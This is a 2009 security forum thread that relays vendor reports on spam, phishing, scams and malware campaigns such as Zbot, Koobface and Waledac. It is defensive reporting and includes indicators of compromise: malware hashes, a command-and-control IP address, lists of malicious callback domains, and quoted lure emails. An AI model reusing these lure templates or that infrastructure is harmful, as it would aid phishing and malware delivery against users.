06-15-2009 - "It may not be encouraging news for scammers, but users are slowly but surely adopting a see-and-delete approach for the usual fake stories related to lotteries, dormant bank accounts, an inheritance of huge wealth, and relatives of deceased or exiled political leaders sharing their millions. However, lately the trends seem to show that news stories involving current events are being piggybacked or manipulated by scammers to trap users into falling for fraudulent offers... Another recent scam we have been monitoring involves an event resembling the highly rated television reality show Big Brother, which began on June 4 in the UK. Scammers have been inviting recipients to participate in their Big Brother World to be held on July 12 in London, UK... Scammers claim to be a Big Brother agent and will furnish the competition details once users respond to the mailed invitation. Users will need to reply with the application type along with their full name, address, age, and telephone number. Even a casual look at the email reveals several spelling mistakes that start right from the subject line and continue on throughout the message, including using “price” instead of “prize” in the mail body. We would recommend that users follow the usual practice of ignoring [and deleting] such unsolicited emails..."
(Screenshot of scam e-mail available at the URL above.)
:fear::mad:
AplusWebMaster
2009-06-19, 17:10
FYI...
- http://blog.trendmicro.com/air-france-flight-447-spam-arrives-with-powerpoint-exploit/
June 17, 2009 - "After a blackhat SEO attack, cybercriminals are again using the terrifying catastrophe of Air France Flight 447 or about China-made C919 Jumbo Jets competing with Airbus and Boeing for malicious intent. This time, spam messages are sent with an attached PowerPoint presentation, which is specially crafted to exploit a vulnerability in Microsoft Powerpoint*. The spammed emails suggest that there are images in the attached PowerPoint presentation related to both the China-made jumbo jets and the Air France Flight 447, in order to lure the user into opening the specially crafted file... Users are strongly advised to apply the patch* provided by Microsoft to avoid being victimized by this threat..."
* http://www.microsoft.com/technet/security/bulletin/ms09-017.mspx
:fear::mad:
AplusWebMaster
2009-06-25, 02:15
FYI...
Nonstop site re-infections
- http://securitylabs.websense.com/content/Blogs/3425.aspx
06.24.2009 - "We recently published an alert* about the Ethiopian Embassy site being compromised... This isn't the first time the site has been compromised. In March of 2009, we noticed an iframe injection pointing to hxxp://[REMOVED]vv.com/index.php. The domain was also serving virus-infected files in other locations, including hxxp://[REMOVED]vv.com/unic/1.exe, a Trojan [see VirusTotal report**]... Attackers are in control and re-compromising the site over and over, potentially infecting visitors with malicious code at any time. These attacks are somewhat of a trend. We've documented a number of compromised embassy sites in the past, illustrating how malware delivery occurs through Web sites..."
* http://securitylabs.websense.com/content/Alerts/3423.aspx
** http://www.virustotal.com/analisis/94c15c9e48895e62dc20a7920b93da630fdf4967237114032d91fe4ecddf05a9-1240536959
"File 5143155606c013934a4601648e310800aff688c2.EXE ..."
(Screenshots and more detail available at the Websense URL above.)
:fear::mad:
AplusWebMaster
2009-06-25, 14:39
FYI...
Zbot In Your Inbox
- http://www.marshal8e6.com/trace/i/Zbot-In-Your-Inbox,trace.1005~.asp
June 24, 2009 - "A password stealing Zbot (ZeuS bot) Trojan has been increasingly spammed throughout the previous two weeks. We believe the spam originates from the Pushdo botnet. The spam template varies from time to time, mostly using subject lines such as “You have received a Greeting ecard ”, “Statement request”, “Microsoft outlook update”, “Postal Tracking” and may come either as an attachment or a link in the message body... Zbot attempts to download a file named "djwl.bin". This file is an encrypted configuration file..."
(Screenshots available at the URL above.)
Also see: http://www.abuse.ch/?p=1192
March 20, 2009
:fear::mad:
AplusWebMaster
2009-06-26, 15:04
FYI...
SPAM runs exploit celebrity deaths
- http://www.theregister.co.uk/2009/06/26/jackson_death_spam/
26 June 2009 - "Spammers have wasted no time exploiting the shock death of Michael Jackson to run an email harvesting campaign. Security watchers warn that malware-laced email themed around the death of the King of Pop and Charlie's Angels star Farrah Fawcett, who also died on Thursday, are likely to follow..."
- http://securitylabs.websense.com/content/Alerts/3426.aspx
06.26.2009
- http://www.virustotal.com/analisis/67cba7b9d91e1cbcac0f22b5f4bcf12f4b07a1a62d7d3018e28ccd5ee93e0ce4-1246012313
File michael_1_.gif received on 2009.06.26 10:31:53 (UTC)
...Result: 5/41 (12.20%)
- http://www.virustotal.com/analisis/d602b5cbc6386e9ba4b7d910ff0eb04fefba5ce06ef6f703e37f76ab88ad2ff9-1246029869
File Michael.Jackson.videos.scr received on 2009.06.26 15:24:29 (UTC)
...Result: 10/41 (24.39%)
- http://www.sophos.com/blogs/sophoslabs//?p=5035
June 26, 2009
:fear::fear:
AplusWebMaster
2009-06-29, 00:19
FYI...
MSN IM - Pushdo variant...
- http://blog.trendmicro.com/msn-bot-plays-on-controversy-over-michael-jacksons-death/
June 26, 2009 - "... a slew of malicious links related to Michael Jackson’s last moments in the hospital before his death are now being proliferated in the wild via the instant messaging (IM) application, MSN... When recipients of such messages click on any of these links, they are then prompted to save a file named PIC-IMG029-www.hi5.com.exe (with the MD5 checksum of 031429fc14151f94c8651a3fb110c19b), instead of being led to an image site or gallery. Initial analysis shows that the said file is a variant of the SDBOT family...
Update - 27 June 2009: The botnet is said to push the templated messages through an IRC to the client to be spammed... The malware responsible for this is detected as WORM_IRCBOT.GAT. It opens a certain port on the affected system then listens for remote commands. Kharouni reports that commands to download certain files are received and executed by the affected system, ultimately leading to the download a PUSHDO variant. PUSHDO is a botnet responsible for a huge amount of spam activity..."
(Screenshot available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2009-06-29, 23:23
FYI...
More celebrity malware...
- http://www.f-secure.com/weblog/archives/00001709.html
June 29, 2009 - "There have been a couple of malware attacks that have tried to use the news coverage of the death of Michael Jackson as the lure to get people infected. Last night we saw this one: a file called Michael-www.google.com.exe. This file was distributed through a site called photos-google.com and possibly also through photo-msn.org, facebook-photo.net and orkut-images.com. Do not visit these sites. When executed, Michael-www.google.com.exe drops files called reptile.exe and winudp.exe. These are IRC bots with backdoor capability. The file also shows this fake error message..."
(Screenshot available at the F-secure URL above.)
- http://www.sophos.com/blogs/gc/g/2009/07/01/michael-jackson-emailaware-worm-hits-inboxes/
July 1, 2009 - "... we have encountered a mass-mailing worm that spams out messages with the following characteristics:
Subject: Remembering Michael Jackson
Attached file: Michael songs and pictures.zip
The email, which claims to come from sarah @michaeljackson.com, says that the attached ZIP file contains secret songs and photos of Michael Jackson. opening the attachment exposes you to infection - and if your computer is hit you will be spreading the worm onto other internet users. Besides spreading via email, the malware is also capable of spreading as an Autorun component on USB memory sticks (an increasingly common trend for malware as use of these devices has become more and more popular). Sophos detects the malware proactively as Mal/ZipMal-B and Mal/VB-AD, and recommends that users of other anti-virus products ensure that their defences are properly updated..."
:fear:
AplusWebMaster
2009-07-02, 02:01
FYI...
Torrentreactor site compromised
- http://securitylabs.websense.com/content/Alerts/3430.aspx
07.01.2009 - "Websense... has detected that Torrentreactor, one of the oldest and most reliable torrent search engines on the Web, has been compromised and injected with malicious code. The site has been injected with an IFrame leading to a site laden with exploits. The exploits on the payload site include Internet Explorer (MDAC) and Microsoft Office Snapshot Viewer, as well as Acrobat Reader and Adobe Shockwave. If the user's browser is successfully exploited, a malicious file is downloaded and run from the exploit site. The malicious file has an extremely low AV detection rate*. The file (MD5: 24bd24f8673e3985fc82edb00b24ba73) is a Trojan Downloader and connects to a Bot C&C server at IP 78.109.29.116. After connecting to the IP, the file downloads a Rootkit installer from the same IP..."
* http://www.virustotal.com/analisis/0df0d26cbb793ba612236b9750309b3e545fa5339e4da159062abfe6f326b2b7-1246425266
File rncsys32.exe received on 2009.07.01 05:14:26 (UTC)
Result: 2/41 (4.88%)
- http://www.theregister.co.uk/2009/07/01/torrentreactor_breach/
1 July 2009 - "... The malicious file in the latest compromise communicates with a server at 78.109.29.116, an IP address that web searches suggest has ties to the Russian Business Network..."
:fear::spider::mad:
AplusWebMaster
2009-07-02, 22:41
FYI...
Click fraud trojan...
- http://secureworks.com/research/threats/ffsearcher/?threat=ffsearcher
June 26, 2009 - "While analyzing a slew of malware downloaded by the exploit kit used in the "Nine-Ball" web attacks, the SecureWorks Counter Threat Unit came across an interesting trojan that used a previously-unseen HTTP request pattern... After some time we came to the conclusion that the trojan was a search hijacker trojan used for click fraud. Click fraud trojans are as old as Internet advertising itself, and usually we see one of two types: browser hijackers that change one's start page and searches to redirect to a third-party search engine, or trojans that silently pull down a list of ad URLs and generate fake clicks on the ads in a hidden Internet Explorer window. This trojan however, was much more subtle and creative - in this case, every click on an ad is user-generated, and the user never notices any change in their web-surfing experience. We call this trojan search hijacker "FFSearcher", named after one of the websites used in this scheme. Detection of the dropper executable by anti-virus engines is poor at this time, with only 4 of 39 scanners* detecting it at all... As click-fraud trojans go, this is one of the more clever that we've seen, with an impressive feature set:
1. Working code to hijack both Firefox and IE
2. Difficult to spot by the average user
3. Minimally impacting to the infected machine
4. Probably difficult for fraud detection systems at the search engine sites to detect, since every ad-click that comes through is generated on purpose by a user in the course of normal web-surfing activity..."
(Screenshots available at the Secureworks URL above.)
* http://www.virustotal.com/analisis/1e7f27f88f4d63bf13267582209f13f3222552988982da2571c6af30262f6c9b-1244830834
File nkavnxe.exe received on 2009.06.12 18:20:34 (UTC)
Result: 4/39 (10.26%)
:fear::fear:
AplusWebMaster
2009-07-04, 01:08
FYI...
Happy 4th from Waledac...
- http://securitylabs.websense.com/content/Alerts/3431.aspx
07.03.2009 - "Websense... has detected yet another new Waledac campaign theme in the wild. The new variant uses an Independence Day theme as a social engineering mechanism. The USA celebrates Independence Day on July 4 each year. The malicious emails that are sent use subjects and content related to Independence Day, Fourth of July and fireworks shows. The malicious Web sites in the current attack also have a July 4 or fireworks theme within the domain name. ThreatSeeker has been monitoring the registration of these domains. Should the user click on the video, which is designed to appear to be a YouTube video, an .exe is offered. When downloaded the .exe would install the latest Waledac variant onto the user's machine..."
(Screenshots available at the URL above.)
- http://www.eset.com/threat-center/blog/?p=1244
July 2, 2009
- http://www.eset.com/threat-center/blog/?p=1250
July 3, 2009
:fear::mad::fear:
AplusWebMaster
2009-07-04, 19:51
FYI...
More on Waledac for the 4th...
- http://blog.trendmicro.com/waledac-celebrates-independence-day-too/
July 4, 2009 - "... These messages contain links to a site which appears to be from Youtube... The video supposedly shows a fabulous fireworks show, but in reality attempting to play the video results in downloading a copy of WORM_WALEDAC.DU..."
(Screenshot available at the URL above)
:fear::mad::fear:
AplusWebMaster
2009-07-06, 04:30
FYI...
Waledac July 4th update - New domains added
- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090704
4 July 2009 - "... quick update on Waledac. We have been keeping an eye on it for a bit and it's been actively spamming and updating clients to Fake Antivirus products for the last few months. However, we also saw it start spamming itself out again starting yesterday. Actually saw a quick first post of the from sudosecure.net:
http://www.sudosecure.net/archives/583
No real need to have tons of duplicate write-ups and screen shots. You can get the same basic information from the site. It's the standard spam to a link involving a fake YouTube video that wants you to download an executable... We have updated our Waledac domain lists that you can use to block/track Waledac domains. The first URL is to the list that is updated with timestamps, ugly comments, and newest domains at the bottom:
http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
We also have the all-time Waledac domain list that contains just the domain listing since the start. It currently has 244 domains on it and can be reached via the following URL:
http://www.shadowserver.org/wiki/uploads/Calendar/waledac_list.txt
These are domains you definitely want to avoid visiting and consider blocking where possible."
:fear::fear:
AplusWebMaster
2009-07-10, 16:12
FYI...
Twitter suspends Koobface infected computers
- http://blog.trendmicro.com/koobface-increases-twitter-activity/
July 9, 2009 - "... Koobface has increased its Twitter activity, sending out tweets with different URL links pointing to Koobface malware. This is in contrast with previous Koobface Twitter activity wherein only three TinyURLs pointing to Koobface were used. As of writing, there are a couple of hunded Twitter users affected by Koobface in the past few hours, but dozens more are being infected as we speak. We advise Twitter users to (not click on) URLs on tweets, especially if the tweet advertises a home video.
Update: It seems this Koobface problem in Twitter is getting bigger and bigger, prompting Twitter itself to temporarily suspend* infected user accounts."
* http://status.twitter.com/post/138789881/koobface-malware-attack
July 9, 2009 - "... If we suspend your account, we will send you an email notifying you of the suspension. This email also includes tips for removing the malware from your PC."
> http://www.sophos.com/blogs/gc/g/2009/07/10/twitter-warns-users-koobface-worm/
July 10, 2009
Preview a TinyURL
- http://tinyurl.com/preview.php
"Don't want to be instantly redirected to a TinyURL and instead want to see where it's going before going to the site? Not a problem with our preview feature..."
- http://www.threatpost.com/blogs/koobface-worm-infections-exploding
July 6, 2009 - "In June, we saw an explosive rise in the number of Koobface modifications - the number of variants we detected jumped from 324 at the end of May to nearly 1000 by the end of June. And this weekend brought another flood, bringing us up to 1049 at the time of writing... Koobface spreads via major social networking sites like Facebook and MySpace. It's now spreading via Twitter as well... the pool of potential victims is growing day by day - just take a look at the Alexa stats* for Facebook. So naturally, cybercriminals are going to be targeting these sites more and more often."
* http://www.alexa.com/siteinfo/facebook.com
"... Percent of global Internet users who visit facebook.com:
... 7 day avg: 20.01% ..."
:fear::mad::fear:
AplusWebMaster
2009-07-21, 15:06
FYI...
H1N1 SPAM w/virus...
- http://www.f-secure.com/weblog/archives/00001734.html
July 21, 2009 - "We recently saw this malicious file being spread in emails. The name of the file was Novel H1N1 Flu Situation Update.exe and the icon made it look like a Word document file. When the file was opened, it created several new files to the hard drive:
• %windir%\Temp\Novel H1N1 Flu Situation Update.doc
• %windir%\Temp\doc.exe
• %windir%\Temp\make.exe
• %windir%\system32\UsrClassEx.exe
• %windir%\system32\UsrClassEx.exe.reg
The executables contain backdoor functionality, including an elaborate keylogger. And the document file that is dropped gets automatically opened by the malware, causing the user to think he really opened a Word file..."
- http://www.sophos.com/blogs/sophoslabs/v/post/5517
July 22, 2009
(Screenshots available at both URLs above.)
:fear::mad:
AplusWebMaster
2009-07-24, 02:22
FYI...
Targeted malware calling home...
- http://www.f-secure.com/weblog/archives/00001736.html
July 23, 2009 - "In targeted attacks, we see more and more attempts to obfuscate the hostname of the server where the backdoors are connecting to. IT staff in many of the targeted organizations are fully aware of these attacks. They keep monitoring their logs for suspicious activity. The admins might spot a host that suddenly connects to known rogue locations like:
• weloveusa.3322.org
• boxy.3322.org
• jj2190067.3322.org
• hzone.no-ip.biz
• tempsys.8866.org
• zts7.8800.org
• shenyuan.9966.org
• xinxin20080628.gicp.net
However, we've now seen a shift in the hostnames. The attackers seem to be registering misleading domain names on purpose, and have now been seen using hosts with names like:
• ip2.kabsersky.com
• mapowr.symantecs.com.tw
• tethys1.symantecs.com.tw
• www.adobeupdating.com
• iran.msntv.org
• windows.redirect.hm
The apparent motive here is that a busy IT administrator might look at a firewall log alert about a machine connecting to www .adobeupdating .com and just disregard it. "That must be the PDF reader trying to download updates..." In reality, adobeupdating.com is registered to somebody in Zaire and has an IP address pointing to Australia."
:fear:
AplusWebMaster
2009-07-31, 19:27
FYI...
Dilbert sends out 419 scams...
- http://www.sophos.com/blogs/sophoslabs/v/post/5633
July 29, 2009 - "... Advance Fee fraud scammers will abuse any free service they can get their hands on to send out their spam messages... In recent days, a group of Nigerian scammers have started abusing the “share-a-comic-strip” feature on Dilbert.com. The scammers do this by including their own fraud message inside the “personal message” portion of the sent messages. This is probably a money-making scheme that Dogbert would approve of..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2009-08-12, 14:23
FYI...
PayPal fraud with CAPTCHA
- http://blog.trendmicro.com/paypal-fraud-with-captcha/
Aug. 11, 2009 - "... CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) used to protect web sites against abusive automated softwares that can register, spam, login, or even splog. However, now a days that isn’t the case anymore. Just like the traditional PayPal phish, the web page http ://{BLOCKED}www.security-paypal.citymax.com /paypal_security.html asks the user to provide feedback from their Shopping by asking for their Name, E-mail Address and PayPal password... After which, a CAPTCHA image is shown and requires the user to enter the code indicated for spam prevention. However, after entering the user’s personal information, this could be used to create bogus mail accounts, among other things..."
(Screenshot available at the URL above.)
:mad:
AplusWebMaster
2009-08-14, 14:47
FYI...
Spam changes HOSTS file...
- http://blog.trendmicro.com/brazil-spam-changing-a-hosts-file/
Aug. 14, 2009 - "We have recently detected a new spam attack that attempts to grab the bank data of Brazilian users. The mechanics of this attack are simple. Users receive this spam email... The mail claims that the user has received an e-card, and contains a link to “read” the said card. Click on the related link, a file is downloaded and executed... Apparently nothing happens, just an Internet Explorer is opened showing a related web card from this initial phishing. In the background, however, the HOSTS file is changed, and set to redirect certain Brazilian baking Web sites to a malicious web site. All information posted in any of the said pages will then be grabbed by the attacker..."
(Screenshots available at the URL above.)
:fear:
AplusWebMaster
2009-08-20, 18:33
FYI...
Facebook apps used for phishing
- http://blog.trendmicro.com/facebook-applications-used-for-phishing/
Aug. 19, 2009 - "It would be easy to think that once someone has logged in successfully to Facebook—and not a phishing site—that the security threat is largely gone. However, that’s not quite the case, as we’ve seen before*. Earlier this week, however, Trend Micro... found at least two—if not more—malicious applications on Facebook. (These were the Posts and Stream applications.) They were used for a phishing attack that sent users to a known phishing domain, with a page claiming that users need to enter their login credentials to use the application. The messages appear as notifications in a target user’s -legitimate- Facebook profile... While Trend Micro has informed Facebook of these findings, users should still exercise caution when entering login credentials. They should be doubly sure that these are being entered into legitimate sites, and not carefully crafted phishing sites..."
* http://blog.trendmicro.com/?s=Koobface
(Screenshots available at the URL at the top listed above.)
:fear::mad::spider:
AplusWebMaster
2009-08-24, 13:20
FYI...
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=219401053
Aug. 21, 2009 - "... According to new data collected by ScanSafe, which filters more than a billion Web queries each month, some 76 percent of companies are now blocking social networking sites - a 20 percent increase over the past six months. More companies now block social networking sites than block Webmail (58 percent), online shopping (52 percent), or sports sites (51 percent), ScanSafe says*. "Social networking sites can expose businesses to malware, and if not used for business purposes, can be a drain on productivity and bandwidth," says Spencer Parker, director of product management at ScanSafe... Companies are also increasing their restrictions on other types of sites, including travel, restaurants, and job hunting sites, according to the data..."
* http://www.scansafe.com/news/press_releases/press_releases_2009/employers_crack_down_on_social_networking_use
.
AplusWebMaster
2009-09-06, 14:08
FYI...
Swine flu SPAM leads to malware
- http://blog.trendmicro.com/fake-presidential-swine-flu-stories-lead-to-malware/
Sep. 5, 2009 - "No one is absolutely safe from Influenza H1N1, not even world leaders. This is the scenario painted by cybercriminals in their latest spam run. The spammed message informs recipients that the President of Peru, Alan Gabriel Ludwig García Pérez, and other attendees of the delegation of UNASUR (Union of South American Nations) summit have confirmed cases of Swine flu. Furthermore, it states that the presidents of Brazil and Bolivia were also both infected but are now recovering... Written in Spanish, the spam attempts to stir recipients’ curiosity by saying that the incident is being kept from the public. It also urges them to click on the malicious link, which purports to contain the audio news pertaining to this incident. Instead of news, however, all victims get is an executable file ( Alan.Gripe.Porcina.mp3 .exe ) detected by Trend Micro as TSPY_BANCOS.AEM. BANCOS variants are known for its info-stealing capabilities..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2009-09-08, 16:05
FYI...
Koobface attacks on Facebook and MySpace...
- http://www.associatedcontent.com/article/2148665/rumored_fan_check_virus_scares_facebook.html?cat=15
September 07, 2009 - "Rumors of a Fan Check virus have circulated in the Facebook community. The Kaspersky Lab* two variants of Koobface viruses which (for now) are only attacking Facebook and MySpace users... As a Facebook user, it's important to remember not to open suspicious links, even if they are from "friends".... had problems in the past with hackers using my friends' accounts to spam or to send viruses. One of the current links is to a YouTube video and a message asking the users to update to the latest version of Flash Player. By clicking, the user will have effectively downloaded a worm..."
* http://www.kaspersky.com/news?id=207575670
- http://www.eset.com/threat-center/blog/2009/09/08/fan-check-fretting-about-facebook
September 8, 2009 - "... Quite a few people are talking about Fan Check at the moment, but mostly in the context of the "Facebook Fan Check Virus" hoax: briefly, the bad guys are using SEO poisoning to ensure that if you look for search terms like "Facebook Fan Check Virus" in a search engine, some of the top-ranking hits you get will be to sites that will try to trick you into downloading a rogue anti-malware application..."
:fear::fear:
AplusWebMaster
2009-09-10, 15:14
FYI...
Bogus work-at-home schemes...
- http://voices.washingtonpost.com/securityfix/2009/09/cyber_theives_steal_447000_fro.html
September 9, 2009 - "Organized cyber thieves are increasingly looting businesses in heists that can net hundreds of thousands of dollars. Security vendors and pundits may be quick to suggest a new layer of technology to thwart such crimes, but in a great many cases, the virtual robbers are foiled because an alert observer spotted something amiss early on and raised a red flag. In mid-July, computer crooks stole $447,000 from Ferma Corp., a Santa Maria, Calif.-based demolition company, by initiating a large batch of transfers from Ferma's online bank account to 39 "money mules," willing or unwitting accomplices who typically are ensnared via job search Web sites into bogus work-at-home schemes..."
:fear::mad:
AplusWebMaster
2009-09-12, 05:24
FYI...
Google Groups trojan
- http://www.symantec.com/connect/blogs/google-groups-trojan
September 11, 2009 - "... A back door Trojan that we are calling Trojan.Grups* has been using the Google Groups newsgroups to distribute commands. Trojan distribution via newsgroups is relatively common, but this is the first instance of newsgroup C&C usage that Symantec has detected. It’s worth noting that Google Groups is not at fault here; rather, it is a neutral party. The authors of this threat have chosen Google Groups simply for its bevy of features and versatility. The Trojan itself is quite simple. It is distributed as a DLL, and when executed will log onto a specific account:
Escape[REMOVED]@gmail.com
h0[REMOVED]t
The Web-based newsgroup can store both static “pages” and postings. When successfully logged in, the Trojan requests a page from a private newsgroup, escape2sun. The page contains commands for the Trojan to carry out. The command consists of an index number, a command line to execute, and optionally, a file to download. Responses are uploaded as posts to the newsgroup using the index number as a subject. The post and page contents are encrypted using the RC4 stream cipher and then base64 encoded. The attacker can thus issue confidential commands and read responses. If no command is received from the static page, the infected host uploads the current time."
* http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-091013-5214-99&tabid=2
:fear::mad:
AplusWebMaster
2009-09-14, 15:45
FYI...
Cyber Crooks Target Public & Private Schools
- http://voices.washingtonpost.com/securityfix/2009/09/cyber_mob_targets_public_priva.html
September 14, 2009; 8:00 AM ET - "A gang of organized cyber criminals that has stolen millions from businesses across the United States over the past month appears to have turned its sights on public schools and universities... Each of the transfers was kept just below $10,000 to avoid banks' anti-money laundering reporting requirements, and went out to at least 17 different accomplices or "money mules" that the attackers had hired via work-at-home job scams... With the help of the victims interviewed in this story, Security Fix was able to track down mules who said they were involved in each of the scams. All said they had been recruited via e-mail to sign up as "financial agents" at a company called Focus Group Inc. According to a write-up* by money mule site tracker Bob Harrison, the Focus Group Web site may look legit, but is "just the latest of the numerous highly generic Russian scam websites that has been set up to form a front for a money laundering fraud job advertisement."
* http://www.bobbear.co.uk/focus-group-inc.html
:fear::mad:
AplusWebMaster
2009-09-19, 17:35
FYI...
PBS site hacked - used to serve exploits
- http://www.threatpost.com/blogs/pbs-website-compromised-used-serve-exploits-118
September 18, 2009 - "Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits. According to researchers at Purewire*, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe. The malicious JavaScript was found on the "Curious George" page that provides content on the popular animation series. A look at the code on the hijacked site shows malicious activity coming from a third-party .info domain. The URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015)..."
* http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits
:fear::mad:
AplusWebMaster
2009-09-22, 01:49
FYI...
Monopoly Game malware...
- http://securitylabs.websense.com/content/Alerts/3481.aspx
09.21.2009 - "Websense... discovered a new spam campaign that is targeting players of the Monopoly game. The Monopoly World Championships take place every four years, and Las Vegas is the host city of 2009. Because the Monopoly Regional Championships are going on all over the world and many Monopoly enthusiasts take part, the spammers utilize this chance to play their tricks. Our email honeypot systems detected over 30 thousand Monopoly spam messages on September 21, 2009 alone. The spam uses a social networking technique to "invite" you to play the online board game. It then provides a link to the fake Monopoly game download site, which in fact downloads a Trojan..."
(Screenshots available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2009-09-25, 17:21
FYI...
Malvertisements - weekend run...
- http://blog.scansafe.com/journal/2009/9/24/weekend-run-of-malvertisements.html
September 24, 2009 - "Between Sep 19-21, malicious banner ads were served via multiple popular sites, including drudgereport.com, lyrics.com, horoscope.com and slacker.com. The ads delivered a trojan downloader using a variety of Adobe PDF exploits as well as the Microsoft ActiveX DirectShow exploit described in MS09-032. Detection of the malicious PDF is quite low, with only 3 out of 41 scanners detecting, as seen in this VirusTotal report*... Attackers use online ads for the same reasons a legitimate company would do so. When an attacker can infiltrate an advertising network, it enables them to reach a broad number of websites within a chosen category. This provides the attacker with the same return on investment that it would a legitimate advertiser – broad exposure to the audience of their choosing..."
- http://www.theregister.co.uk/2009/09/24/malware_ads_google_yahoo/
24 September 2009 - "... They were delivered over networks belonging to Google's DoubleClick; Right Media's Yield Manager (owned by Yahoo); and Fastclick, owned by an outfit called ValueClick... the payload installed Win32/Alureon, a trojan that drops a backdoor on infected machines... also appeared on slacker.com ..."
- http://www.virustotal.com/analisis/6aca4742834c0b72b37907923b4c52589255f1bb1e29fe56f1ea5b376322023b-1253635686
File 201f338a343e02a41dc7a5344878b862 received on 2009.09.22 16:08:06 (UTC)
Current status: finished
Result: 3/41 (7.32%)
:mad:
AplusWebMaster
2009-09-28, 16:26
FYI...
Phishing attacks reach record levels in Q2 2009
- http://www.markmonitor.com/pressreleases/2009/pr090928-bji.php
September 28 2009 - "...
• During Q2 2009, phish attacks reached record levels with more than 151,000 unique attacks
• The average number of phishing attacks per organization also increased to record levels, with 351 attacks per organization, on average, in Q2 2009
• Social networking attacks continued to rise significantly, recording a 168% increase from the same period in 2008
• Brands in the financial and payment services industries are the most heavily-targeted industry categories for phishers, constituting 80 percent of all phish attacks in Q2 2009..."
:fear::fear:
AplusWebMaster
2009-10-02, 07:38
FYI...
Fraudsters on social networking sites
- http://www.ic3.gov/media/2009/091001.aspx
October 1, 2009 - "Fraudsters continue to hijack accounts on social networking sites and spread malicious software by using various techniques. One technique involves the use of spam to promote phishing sites, claiming there has been a violation of the terms of agreement or some other type of issue which needs to be resolved. Other spam entices users to download an application or view a video. Some spam appears to be sent from users' "friends", giving the perception of being legitimate. Once the user responds to the phishing site, downloads the application, or clicks on the video link, their computer, telephone or other digital device becomes infected. Another technique used by fraudsters involves applications advertised on social networking sites, which appear legitimate; however, some of these applications install malicious code or rogue anti-virus software. Other malicious software gives the fraudsters access to your profile and personal information. These programs will automatically send messages to your "friends" list, instructing them to download the new application too. Infected users are often unknowingly spreading additional malware by having infected Web sites posted on their Webpage without their knowledge. Friends are then more apt to click on these sites since they appear to be endorsed by their contacts..."
(Tips on avoiding these tactics available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2009-10-13, 18:09
FYI...
SSL SPAM... w/Zbot
- http://isc.sans.org/diary.html?storyid=7333
Last Updated: 2009-10-13 13:13:34 UTC - "... started receiving SPAM messages along the following lines:
'On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour. The changes will concern security, reliability and performance of mail service and the system as a whole. For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure. This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all.
http ://evil-link/evil-file
Thank you in advance for your attention to this matter and sorry for possible inconveniences...'
UPDATE
the sample file we received was named patch.exe MD5=9abc553703f4e4fedb3ed975502a2c7a
ZBOT characteristics, so trojan, keylogger, disables AV.
http://www.threatexpert.com/report.aspx?md5=9abc553703f4e4fedb3ed975502a2c7a
"... Trojan-Spy.Zbot.YETH - Trojan-Spy.Zbot.YETH is a rootkit trojan which steals online banking information and downloads other malware as well..."
... ThreatExpert on the file... http://www.threatexpert.com/report.aspx?md5=174aeb93b8d642c2cddfd9c50b0015c9
"... Trojan-Spy.Zbot.YETH - Trojan-Spy.Zbot.YETH is a rootkit trojan which steals online banking information and downloads other malware as well..."
___
- http://blog.trendmicro.com/tailor-made-zbot-spam-campaign-targets-various-companies/
Oct. 14, 2009
:fear::fear:
AplusWebMaster
2009-10-14, 21:53
FYI...
New variation of SSL Spam
- http://isc.sans.org/diary.html?storyid=7357
Last Updated: 2009-10-14 18:25:16 UTC
"... update to a diary we did earlier this week. The body of the spam today is:
' Dear user of the <some company> mailing service!
We are informing you that because of the security upgrade of the mailing
service your mailbox (<user>@<some company>) settings were changed. In
order to apply the new set of settings click on the following link ... '
The email contains a link with a file to download. Some of the files we have seen are:
settings-file.exe MD5: 0244586f873a83d89caa54db00853205
settings-file2.exe MD5: e6436811c99289846b0532812ac49986
The files are being detected by some anti-virus software programs at this time as Zbot variants..."
:fear:
AplusWebMaster
2009-10-15, 02:42
FYI...
Outlook SPAM/Scam w/malware
- http://securitylabs.websense.com/content/Alerts/3491.aspx
10.14.2009 - "Websense... has discovered a new wave of malicious attacks claiming to be an update for Microsoft Outlook Web Access (OWA). Victims receive a message leading to a site to apply mailbox settings which were supposedly changed due to a "security upgrade." The especially dangerous thing about these messages is that they are very deceiving. The messages and attack pages are personalized for the To: email address to imply the message is being sent from tech support of the domain. The URL in the email looks like it leads to the company's own OWA system. We have seen upwards of 30,000 of these messages per hour and they have low AV detection*... The malicious site is also very believable. The victim's domain is used as a sub-domain to the site so that the attack site appears to be the victim's actual OWA site. The victim's domain name and email address are also used in a number of locations on the malicious site to make it that much more believable..."
* http://www.virustotal.com/analisis/e212d7e75478fa9ce4a8afbbd2e730a301f17fb2253567b72e00f59bf51a99b8-1255552077
File settings-file.exe received on 2009.10.14 20:27:57 (UTC)
Result: 6/41 (14.63%)
(Screenshots available at the Websense URL above.)
- http://www.us-cert.gov/current/#malware_circulating_via_spam_messages
October 15, 2009
:fear:
AplusWebMaster
2009-10-15, 14:03
FYI...
New Koobface campaign spoofs Adobe's Flash updater
- http://blogs.zdnet.com/security/?p=4594
October 14, 2009 - "Earlier this week, the botnet masters behind the most efficient social engineering driven botnet, Koobface, launched a new campaign currently spreading across Facebook with a new template spoofing Adobe’s Flash updater embedded within a fake Youtube page. The malware campaign is relying on compromised legitimate web sites, now representing 77% of malicious sites in general, and on hundreds of automatically registered Blogspot accounts with the CAPTCHA recognition process done on behalf of the users already infected by Koobface, compared to the gang’s previous reliance on commercial CAPTCHA recognition services..."
:fear:
AplusWebMaster
2009-10-16, 15:06
FYI...
Zbot SPAM campaign continues
